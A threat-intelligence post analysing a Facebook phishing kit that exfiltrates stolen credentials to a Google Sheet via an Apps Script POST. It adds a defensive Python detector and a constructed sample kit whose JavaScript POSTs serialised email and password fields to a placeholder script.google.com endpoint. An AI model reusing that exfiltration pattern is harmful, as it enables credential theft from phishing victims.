Phishing kit using Google sheet to exfiltrate stolen data

Analysis of a Facebook phishing kit that exfiltrates stolen data to an online Google Sheet using an AJAX POST request.


As we operate a StalkPhish instance which scans thousands of suspicious links a day, we often find, let's say, original phishing kits to analyse. Today we found a phishing kit targeting Vietnamese Facebook users:

Vietnamese Facebook phishing page

We retrieved the source code, as the zip file was still on the server. The phishing kit zip file contains only one page, some images and CSS, and a JavaScript file:

Phishing kit zip file sources

There is no e-mail exfiltration vector, as is commonly seen: this kit uses a Google Sheets form and an AJAX POST to exfiltrate the stolen credentials!

Reading the HTML file source code, we can see that the page grabs the victim's IP address, the domain and the date:

As well as the identifiers entered by users:

Then validation-function.js is called. This JavaScript function, after data validation and serialization, sends the stolen data to a Google Sheet via a POST request, using the sheet as a database:

kit JS function

This function relies on a Google Apps Script function, which permits writing into the Google Sheet through the API!
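As an added example, not part of the original post or of the kit's own code, here is a small Python triage script that flags unpacked kit sources showing this pattern: a Google Apps Script web-app endpoint, an AJAX POST of serialised form data, and credential-looking fields, plus the IP/domain/date context this kit records. The two sample kits are constructed for the test and the deployment id in the URL is a placeholder.

```python
import re

# Google Apps Script web-app endpoint (deployment id in the path) used as a
# write-only "database" for stolen form data. Ids are alphanumeric with - and _.
APPS_SCRIPT_RE = re.compile(r"https?://script\.google\.com/macros/s/[A-Za-z0-9_-]+/(?:exec|dev)\b")
# Hints that form contents are serialised and sent by an AJAX POST.
POST_HINTS = (r"\$\.ajax\s*\(", r"""\btype\s*:\s*["']POST["']""",
              r"""\bmethod\s*:\s*["']POST["']""", r"\.serialize\s*\(", r"\bfetch\s*\(")
# Credential-looking field names, and the extra context this kit records.
CRED_FIELDS = (r"\bpass(?:word)?\b", r"\bemail\b", r"\bphone\b", r"\busername\b")
CONTEXT_FIELDS = (r"\bip\b", r"\bdomain\b", r"\bdate\b")

def _matches(patterns, text):
    """Return the patterns that occur in text (case-insensitive)."""
    return {p for p in patterns if re.search(p, text, re.IGNORECASE)}

def scan_kit(files):
    """files: mapping of file name -> source text from an unpacked kit.
    The kit is flagged when an Apps Script endpoint, an AJAX POST and
    credential fields all appear somewhere in its sources."""
    report = {"endpoints": set(), "post_hints": set(), "cred_fields": set(), "context_fields": set()}
    for text in files.values():
        report["endpoints"].update(APPS_SCRIPT_RE.findall(text))
        report["post_hints"] |= _matches(POST_HINTS, text)
        report["cred_fields"] |= _matches(CRED_FIELDS, text)
        report["context_fields"] |= _matches(CONTEXT_FIELDS, text)
    report["suspicious"] = bool(report["endpoints"] and report["post_hints"] and report["cred_fields"])
    return report

# Constructed samples (not the real kit): a minimal kit-like pair of files and a benign login page.
SAMPLE_KIT = {
    "index.html": '<form id="f"><input name="email"><input name="password"></form>'
                  '<script src="validation-function.js"></script>',
    "validation-function.js":
        'function send() {\n'
        '  var d = $("#f").serialize() + "&ip=" + ip + "&domain=" + document.domain + "&date=" + new Date();\n'
        '  $.ajax({ url: "https://script.google.com/macros/s/PLACEHOLDER_DEPLOYMENT_ID/exec",\n'
        '           type: "POST", data: d });\n'
        '}\n',
}
BENIGN_SITE = {
    "index.html": '<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">'
                  '<form method="post" action="/login"><input name="email"><input name="password"></form>',
}

if __name__ == "__main__":
    for name, kit in (("sample kit", SAMPLE_KIT), ("benign site", BENIGN_SITE)):
        r = scan_kit(kit)
        print(f"{name}: suspicious={r['suspicious']} endpoints={sorted(r['endpoints'])}")
```

The endpoint regex alone is a useful hunting indicator in proxy and DNS logs, since a legitimate login page has no reason to POST credentials to script.google.com.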

Take aways

index.html (SHA256): 3cfd92bdd9a801382199a52624ecaa8b78a32dc80893f0a6186cce4128c6552b

phishing kit archive (SHA256): 34ee59548f8ba626568d91393acb76791a559f958c1f61bf5dabeb425e396640

Phishing Kit Yara Rule: https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_Facebook_GSheet.yar
